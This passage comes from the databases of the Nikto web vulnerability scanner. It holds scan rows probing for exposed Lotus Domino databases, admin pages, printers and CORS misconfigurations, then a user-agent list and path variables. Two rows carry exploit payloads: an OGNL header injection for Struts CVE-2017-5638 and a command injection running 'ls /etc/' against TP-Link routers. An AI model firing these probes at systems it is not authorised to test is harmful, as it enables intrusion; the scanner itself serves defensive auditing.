information.\",\"\",\"\"\n\"007603\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail/admin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007604\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/domino.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007605\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/user.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007606\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/products.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007607\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/secure.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007608\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/readme.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007609\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/help6_client.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007610\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/help6_designer.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007611\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/help/help6_admin.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007612\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/dbdirman.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007613\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/lndfr.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007614\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/home.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007615\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007616\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/bookmarks.nsf\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007617\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/srvnam.htm\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007618\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail10.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007619\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail1.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007620\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail2.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007621\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail3.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007622\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail4.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007623\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail5.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007624\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail6.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007625\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail7.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007626\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail8.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007627\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/mail9.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007628\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/smtp.box\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007629\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/852566C90012664F\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read using the replica ID without authentication.\",\"\",\"\"\n\"007630\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/iNotes/Forms5.nsf/$DefaultNav\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007631\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/faqw46\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007632\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/framew46\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007633\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/pagesw46\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007634\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/siregw46\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007635\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/site1w4646\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007636\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/site2w4646\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007637\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/sample/site3w4646\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This database can be read without authentication, which may reveal sensitive information.\",\"\",\"\"\n\"007638\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"13b\",\"/?Open\",\"GET\",\"CODE:200&&BODY:(?i)domino&&!BODY:Please\\sidentify\\syourself\\|type=\\\"password\\\"\\|Domino\\sAdministrator\\s\\d+\\sHelp\\|<TITLE>Server\\sLogin</TITLE>\",\"This displays a list of all databases on the server. Disable this capability via server options.\",\"\",\"\"\n\"007639\",\"https://docs.tibco.com/products/tibco-jaspersoft\",\"be\",\"/jasperserver-pro/login.html\",\"GET\",\"CODE:200&&BODY:Jaspersoft\\:\\sLogin\",\"Jaspersoft administrative interface found.\",\"\",\"\"\n\"007640\",\"https://docs.tibco.com/products/tibco-jaspersoft\",\"be\",\"/jasperserver/login.html\",\"GET\",\"CODE:200&&BODY:Jaspersoft\\:\\sLogin\",\"Jaspersoft administrative interface found.\",\"\",\"\"\n\"007641\",\"https://tomcat.apache.org/tomcat-7.0-doc/config/valve.html#Error_Report_Valve\",\"3\",\"/?{\",\"GET\",\"CODE:400&&BODY:org\\.apache\\.coyote\",\"Tomcat verbose errors are enabled which reveal stack trace information.\",\"\",\"\"\n\"007642\",\"https://docs.docker.com/registry/\",\"b\",\"/v2/_catalog\",\"GET\",\"HEADER:docker-distribution-api-version\",\"Docker Registry server identified.\",\"\",\"\"\n\"007643\",\"CVE-2017-5638\",\"8\",\"@STRUTSACTIONS\",\"GET\",\"HEADER:nikto-added-cve-2017-5638:42\",\"Site appears vulnerable to the 'strutshock' vulnerability.\",\"\",\"Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('Nikto-Added-CVE-2017-5638',7*6)}.multipart/form-data\"\n\"007644\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS\",\"3\",\"/\",\"GET\",\"HEADER:access\\-control\\-allow\\-origin:nikto\\.example\\.com\",\"Site reflects arbitrary CORS Origin headers without validation.\",\"\",\"Origin: nikto.example.com\"\n\"007645\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS\",\"3\",\"/\",\"GET\",\"HEADER:access\\-control\\-allow\\-origin:@HOSTNAME\\.example\\.com\",\"Site reflects CORS Origin headers which partially match the domain without full validation.\",\"\",\"Origin: @HOSTNAME.example.com\"\n\"007646\",\"\",\"3b\",\"/\",\"GET\",\"BODY:(?:.*office.xerox.com.*Model=)([A-Za-z0-9+]+)\",\"Host seems to be a Xerox printer, model: $1\",\"\",\"\"\n\"007647\",\"\",\"3b\",\"/\",\"GET\",\"BODY:office.xerox.com.*Model=([A-Za-z0-9+]+)\",\"Host seems to be a Xerox printer, model: $1\",\"\",\"\"\n\"007648\",\"\",\"3b\",\"/\",\"GET\",\"BODY:(?i)HEAD_NODE.*Xerox([ A-Z0-9a-z.]+)\",\"Host seems to be a Xerox printer, model: $1\",\"\",\"\"\n\"007649\",\"\",\"3b\",\"/\",\"GET\",\"BODY:(?i)(Phaser[ A-Z0-9a-z]+)<\\/title>\",\"Host seems to be a Xerox printer, model: $1\",\"\",\"\"\n\"007650\",\"\",\"3b\",\"/\",\"GET\",\"BODY:var\\sprd\\=['\\\"]([XxWw][EeOo][Rr][OoKk][XxCc][ A-Z0-9a-z]+)['\\\"];\",\"Host seems to be a Xerox printer, model: $1\",\"\",\"\"\n\"007651\",\"\",\"3b\",\"/hp/device/this.LCDispatcher\",\"GET\",\"BODY:(?i)\\<title>\\)(HP\\sLaserjet[ A-Z0-9a-z]+)\\</title>\",\"Host seems to be an HP Laserjet printer, model: $1\",\"\",\"\"\n\"007652\",\"\",\"3b\",\"/hp/device/this.LCDispatcher\",\"GET\",\"BODY:(?i)\\<title\\>(HP\\sColor\\sLaserJet\\s?[ A-Z0-9a-z]+)<\\/title\\>\",\"Host seems to be an HP Laserjet printer, model: $1\",\"\",\"\"\n\"007653\",\"\",\"3b\",\"/hp/device/this.LCDispatcher\",\"GET\",\"BODY:(?i)(HP\\sColor\\sLaserJet\\s?[ A-Z0-9a-z]+)<\\/title>\",\"Host seems to be an HP Laserjet printer, model: $1\",\"\",\"\"\n\"007654\",\"\",\"3b\",\"/hp/device/this.LCDispatcher\",\"GET\",\"BODY:(?i)(HP\\sLaserJet\\s?[ A-Z0-9a-z]+)<\\/title>\",\"Host seems to be an HP Laserjet printer, model: $1\",\"\",\"\"\n\"007655\",\"\",\"3b\",\"/hmstat.htm\",\"GET\",\"BODY:(?i)var\\sspcs\\=\\[['\\\"]([Workc][ A-Z0-9a-z]+)['\\\"]\",\"Host seems to be a Xerox printer, model: $1\",\"\",\"\"\n\"007656\",\"\",\"3b\",\"/SoundBridgeStatus.html\",\"GET\",\"BODY:SoundBridge is running software version ([0-9.]*)\",\"Host seems to be a Roku SoundBridge media device version: $1\",\"\",\"\"\n\"007657\",\"\",\"3b\",\"/eng/start/StatPtrGen.htm\",\"GET\",\"BODY:PrinterGen\\[0\\];\\ssData\\[count\\+\\+\\]\\s\\=\\s\\\"([\\S]*)\\\"\",\"Host seems to be a Kyocera printer, model: $1\",\"\",\"\"\n\"007658\",\"\",\"3b\",\"/cab/top.shtml\",\"GET\",\"BODY:<span class=\\\"product_name\\\">([A-Z0-9]*)\\<\\/span\\>\\<\\/td\\>\",\"Host seems to be a Canon printer, model: $1\",\"\",\"\"\n\"007659\",\"\",\"3b\",\"/home.asp\",\"GET\",\"BODY:\\<td\\>\\<b class=\\\"is\\\"\\>\\<center\\>([\\._\\-A-Z0-9a-z\\(\\)\\/ ]*)\\<\\/center\\>\\<\\/td\\>\\<\\/tr\\>\",\"Host seems to be a Cyclades terminal server, version: $1\",\"\",\"\"\n\"007660\",\"https://www.hpe.com/us/en/hpe-integrated-lights-out-ilo.html\",\"3b\",\"/\",\"GET\",\"BODY:serverName\\=\\\"([A-Za-z0-9\\-\\.]+)\\\";\",\"Host seems to be an HP iLO device, hostname: $1\",\"\",\"\"\n\"007661\",\"https://swagger.io/\",\"e3\",\"/swagger/docs/v1\",\"GET\",\"BODY:swagger\\\"\\:\",\"Swagger JSON found.\",\"\",\"\"\n\"007662\",\"https://learn.microsoft.com/en-us/exchange/clients/exchange-activesync/exchange-activesync\",\"2be\",\"/Microsoft-Server-ActiveSync\",\"GET\",\"CODE:401&&HEADER:www-authenticate:(?i)basic realm=\\\"([^\\\"]+)\\\"\",\"Microsoft ActiveSync endpoint with realm '$1' found.\",\"\",\"\"\n\"007663\",\"https://dev.wix.com/docs/api-reference\",\"13d\",\"/my-site/_api/v1/access-tokens\",\"GET\",\"CODE:200&&BODY:eyJ&&BODY:visitorId\",\"The Wix API may be leaking session details.\",\"\",\"\"\n\"007664\",\"https://dev.wix.com/docs/api-reference\",\"13d\",\"/_api/v1/access-tokens\",\"GET\",\"CODE:200&&BODY:eyJ&&BODY:visitorId\",\"The Wix API may be leaking session details.\",\"\",\"\"\n\"007665\",\"https://docs.microsoft.com/en-us/previous-versions/windows/silverlight/dotnet-windows-silverlight/cc197955(v=vs.95)?redirectedfrom=MSDN\",\"13\",\"/clientaccesspolicy.xml\",\"GET\",\"CODE:200&&BODY:access\\-policy\",\"A Microsoft Silverlight client access policy file was found.\",\"\",\"\"\n\"007666\",\"http://jeremiahgrossman.blogspot.com/2008/05/crossdomainxml-invites-cross-site.html\",\"13\",\"/crossdomain.xml\",\"GET\",\"CODE:200&&BODY:access\\-from\",\"A Flash cross-domain policy file was found.\",\"\",\"\"\n\"007667\",\"https://www.ibm.com/support/pages/ibm-domino-ibm-i\",\"be\",\"/download/filesets/l_LOTUS_SCRIPT.inf\",\"GET\",\"CODE:200&&BODY:Version\\=([0-9.]+)|Domino\\sRelease\\s([0-9A-Z.]+)\",\"Lotus Domino version $1 found.\",\"\",\"\"\n\"007668\",\"https://blog.cloudflare.com/markdown-for-agents/\",\"1\",\"/\",\"GET\",\"CODE:200&&HEADER:x-markdown-tokens\",\"Cloudflare Markdown For Agents enabled. This returns page content in Markdown instead of HTML.\",\"\",\"Accept: text/markdown\"\n\"007669\",\"CVE-2023-1389\",\"8\",\"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(ls+/etc/)\",\"GET\",\"CODE:200&&BODY:passwd&&BODY:hosts\",\"TP-Link Archer AX21 (AX1800) is vulnerable to remote command execution vulnerability\",\"\",\"\"\n"
  },
  {
    "path": "program/databases/db_useragents",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Chrome – Windows 11\n\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.6280.45 Safari/537.36\"\n\n# Chrome – macOS 14\n\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.6252.12 Safari/537.36\"\n\n# Chrome – Linux\n\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.6285.78 Safari/537.36\"\n\n# Chrome – Android 14\n\"Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.6252.82 Mobile Safari/537.36\"\n\n# Chrome – Android 15 Beta\n\"Mozilla/5.0 (Linux; Android 15; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.6286.11 Mobile Safari/537.36\"\n\n# Edge – Windows 11\n\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.6281.32 Safari/537.36 Edg/142.0.6281.32\"\n\n# Edge – macOS 14\n\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.6248.19 Safari/537.36 Edg/141.0.6248.19\"\n\n# Firefox – Windows 11\n\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\"\n\n# Firefox – macOS 14\n\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.2; rv:133.0) Gecko/20100101 Firefox/133.0\"\n\n# Firefox – Linux\n\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0\"\n\n# Safari – macOS 14.4\n\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15\"\n\n# Safari – macOS 15 preview (2025 dev seeds)\n\"Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15\"\n\n# Safari – iOS 17.5 (iPhone)\n\"Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1\"\n\n# Safari – iOS 18 (2025)\n\"Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1\"\n\n# Chrome – iOS 18\n\"Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/141.0.6252.91 Mobile/15E148 Safari/604.1\"\n\n# Edge – iOS 18\n\"Mozilla/5.0 (iPhone; CPU iPhone OS 18_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/142.0.6281.42 Mobile/15E148 Safari/605.1.15\"\n\n# Firefox – Android 14\n\"Mozilla/5.0 (Android 14; Mobile; rv:133.0) Gecko/133.0 Firefox/133.0\"\n\n# Opera – Windows 11\n\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.6282.50 Safari/537.36 OPR/104.0.0.0\"\n\n# Vivaldi – macOS\n\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.6283.10 Safari/537.36 Vivaldi/6.7.3312.4\"\n\n# Brave – Windows 11\n\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.6284.18 Safari/537.36 Brave/1.67.120\"\n"
  },
  {
    "path": "program/databases/db_variables",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n# Variables which will be used as replacements for values in the scan_database.db and user_scan_database.db files. \n# Any values to be replaced must start with the @ character, such as: @CGIDIRS.\n# They should be unique names and *not* substrings of each other, e.g., @CGI and @CGIDIRS\n# \n# User defined variables should be set in config.txt as this file may be over-written during updates.\n#######################################################################\n@CGIDIRS=/cgi.cgi/ /webcgi/ /cgi-914/ /cgi-915/ /bin/ /cgi/ /mpcgi/ /cgi-bin/ /ows-bin/ /cgi-sys/ /cgi-local/ /htbin/ /cgibin/ /cgis/ /scripts/ /cgi-win/ /fcgi-bin/ /cgi-exe/ /cgi-home/ /cgi-perl/ /scgi-bin/ /cgi-bin-sdb/ /cgi-mod/\n@NUKE=/ /postnuke/ /postnuke/html/ /modules/ /phpBB/ /forum/\n@ADMIN=/admin/ /adm/ /administrator/\n@USERS=adm bin daemon ftp guest listen lp mysql noaccess nobody nobody4 nuucp operator root smmsp smtp sshd sys test uucp web www\n@PASSWORDDIRS=/ /admin/ /clients/ /pass/ /password/ /passwords/ /store/ /users/ /access/ /members/ /private/ /ccbill/ /dmr/ /mastergate/ /dmr/ /epoch/ /netbilling/ /webcash/ /wwwjoin/ /etc/security/\n@PASSWORDFILES=admins clients pass password passwords passwd passwd.adjunct store users .htpasswd .passwd\n@PHPMYADMIN=/3rdparty/phpMyAdmin/ /phpMyAdmin/ /3rdparty/phpmyadmin/ /phpmyadmin/ /pma/ /.tools/phpMyAdmin/current/\n@HTTPFOUND=200 301 302 403\n@FCKEDITOR=/fckeditor/ /FCKeditor/ /Script/fckeditor/ /sites/all/modules/fckeditor/fckeditor/ /modules/fckeditor/fckeditor/ /class/fckeditor/ /inc/fckeditor/ /sites/all/libraries/fckeditor/ /js/editor/fckeditor/ /includes/fckeditor/ /include/fckeditor/ /modules/fckeditor/ /plugins/fckeditor/\n@CRYSTALREPORTS=/ /CrystalReports/ /crystal/ /businessobjects/ /crystal/enterprise10/ /crystal/Enterprise10/ePortfolio/en/\n@OWNCLOUD=/ /cloud/ /owncloud/ /ownCloud/ /OwnCloud/\n@OCFILES=data/owncloud.log data/htaccesstest.txt data/owncloud.db\n@SECLORE=/ /filesecure/ /policyserver/\n@SHELLSHOCK=admin.cgi administrator.cgi authLogin.cgi bb-hist.sh banner.cgi book.cgi cgiinfo.cgi cgitest.py cgi_wrapper contact.cgi count.cgi defaultwebpage.cgi download.cgi entropysearch.cgi env.cgi environment.cgi ezmlm-browse formmail.cgi FormMail-clone.cgi guestbook.cgi helpdesk.cgi index.cgi index.php index.pl info.cgi info.sh loadpage.cgi login.cgi login.php login.pl pathtest.pl php php4 php5 php-cgi php.cgi php.fcgi printenv restore_config.cgi ruby.rb search search.cgi server.php status sysinfo.pl test test-cgi test.cgi test_cgi.php test.cgi.php test_cgi.pl 